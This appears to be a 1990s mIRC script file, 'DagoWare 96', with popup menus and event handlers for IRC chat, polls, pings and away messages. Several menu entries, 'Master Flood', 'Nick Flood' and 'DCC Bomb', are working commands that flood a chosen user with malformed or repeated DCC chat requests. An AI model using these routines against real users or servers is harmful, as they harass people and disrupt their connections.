n0=-=DagoWare 96=-:/ame is currently using DagoWare 96 made by Dago. | /ame To get this script, please contact "Dago or Send Email To:dago@hotmail.com".
n1=Close Windows
n2=.Chat:/close -c $?="Enter Nick"
n3=.Fserv:/close -f $?="Enter Nick"
n4=.Get:/close -g $?="Enter Nick"
n5=.Send:/close -s $?="Enter Nick"
n6=.Inactive:/close -i $?="Enter Nick"
n0=Mail Stuff <Only Works When Connected To Mail Server>
n1=.See E-Mail:/seemail
n2=.Get EMail:/getmail 1
n3=.Quit E-Mail:/quitmail
n5=.Ignore:/ignore $$* | /msg $nick $upper($nick), You have been added to the ignore list of $me ÖÖ REASON: ÖÖ $?="Enter reason" ÖÖ | /msg # $upper($$1) Has been added to the IGNORE list of Fugi.
n6=.Remove:/msg # $upper($$1) has been removed from the IGNORE list of $me! $upper($$1) is lucky. | /ignore -r $$1
n7=UCentral:/uwho $$1
n8=Whois:/whois $$1
n10=.Ping:/ctcp $$1 ping
n11=.Finger:/ctcp $$1 finger
n12=.Version:/ctcp $$1 version
n13=.Time:/ctcp $$1 time
n14=.Userinfo:/ctcp $$1 userinfo
n15=.ClientInfo:/ctcp $$1 clientinfo
n17=.Send:/dcc send $$1
n18=.Chat:/dcc chat $$1
n21=.Master Flood
n22=..Start:/raw -q privmsg $?="Enter nickname to FLOOD!" :DCC CHAT CHAT 3453550597 19 | /echo 4 $active Flooding $$1... You won't be able to tell. ┼cmú-ºcrφ■t
n23=..!!!!! DO NOT USE THIS FLOOD ON Dago !!!!!:/echo 4 $active You heard me. No flooding Dago. 12-=DagoWare 96=-
n24=.Nick Flood
n25=..Start:/timer5 100 1 /nick $rand(1,999)
n26=..Halt:/timer5 off
n27=.DCC Bomb
n28=..Start:/timer6 999 1 /dcc chat $?="Enter person to DCC bomb."
n29=..Halt:/timer6 off
n0=-=DagoWare 96=-:/ame is currently using 12-=DagoWare 96=- made by Dago. | /ame To get this script, please contact "Dago or Send Email To:9dago@hotmail.com".
n6=1:TIME:/notice $nick I don't wanna tell you my time! You might hack into my computer and steal all my files! You could also give me a virus if I gave you my time! Sheesh. I'm not stupid. :o) 12-=DagoWare 96=-
n7=1:VERSION:/notice $nick I'm using 12-=DagoWare 96=- By:9Dago
n8=1:USERINFO:/notice $nick You have reached a non-working number, please try again later...12-=DagoWare 96=- | /halt
n12=REM 1:page:/beep 3 500 | /notice $me ***** $nick just paged you ***** | /speak $nick just paged you | /notice $nick Hi, I'll answer you a.s.a.p, if I don't within a minute or so please leave a message :-) 12-=DagoWare 96=-
n13=1:ON FILERCVD:/notice $Nick File Send Has Completed! Do Enjoy! 12-=DagoWare 96=-
n14=1:ON DNS:/say $chan
n15=1:CLIENTINFO:notice $nick You are $nick $+ ,calling from $ip - $site - $server - $Port (enough info?) 12-=DagoWare 96=- | halt
n66= /notice $nick Welcome to Ä $+ $chan $+ Ä You are the %count person to visit as of $+ $date $+ Channel counter stats provided by 12-=DagoWare 96=-
n68=!1:ON QUIT:/onquit
n69=#polls disabled
n70=1:ON TEXT:!yes*:#: {
n71= if ($nick isin %notagain) { /notice $nick You Can Only Vote Once DEWD 12-=DagoWare 96=- | /halt }
n72= /set %notagain %notagain $nick
n73= /inc %yes
n75=1:ON TEXT:!no*:#: {
n76= if ($nick isin %notagain) { /notice $nick You Can Only Vote Once DEWD 12-=DagoWare 96=-| /halt }
n77= /set %notagain %notagain $nick
n78= /inc %no
n80=#poll end
n81=1:on text:*ping me*:#:/ctcp $nick ping
n82=1:on text:*ping pl*:#:/ctcp $nick ping
n83=1:on text:*my ping*:#:/ctcp $nick ping
n84=1:on text:*lagged?*:#:/ctcp $nick ping
n85=1:on action:*ping me*:#:/ctcp $nick ping
n86=1:on action:*ping pl*:#:/ctcp $nick ping
n87=1:on action:*my ping*:#:/ctcp $nick ping
n88=1:on action:*lagged?*:#:/ctcp $nick ping
n89=1:on ctcpreply:*ping*: %pt = $ctime - $parm2 | /notice $nick **Your ping reply is %pt seconds** | /notice $Nick Brought To You By: 12-=DagoWare 96=-
n90=#away start
n91=1:on text:*<your nick>*:#:/notice $nick I've been away for %minutes minutes - %away 12-=DagoWare 96=-
n92=1:on action:*<your nick>*:#:/notice $nick I've been away for %minutes minutes - %away 12-=DagoWare 96=-
n93=1:on text:*:?:/msg $nick Hi $nick, I've been away for %minutes minutes - %away 12-=DagoWare 96=-
n94=#away end
n95=#pagersay start
n96=1:on text:*<your nick>*:#:/notice $nick Hi $nick, please <ò> /ctcp $me page <ò> to yell at me 12-=DagoWare 96=-
n97=1:on action:*<your nick>*:#:/notice $nick Hi $nick, please <ò> /ctcp $me page <ò> to yell at me 12-=DagoWare 96=-
n98=1:on text:*:?:/msg $nick Hi $nick, please <ò> /ctcp $me page <ò> to yell at me 12-=DagoWare 96=-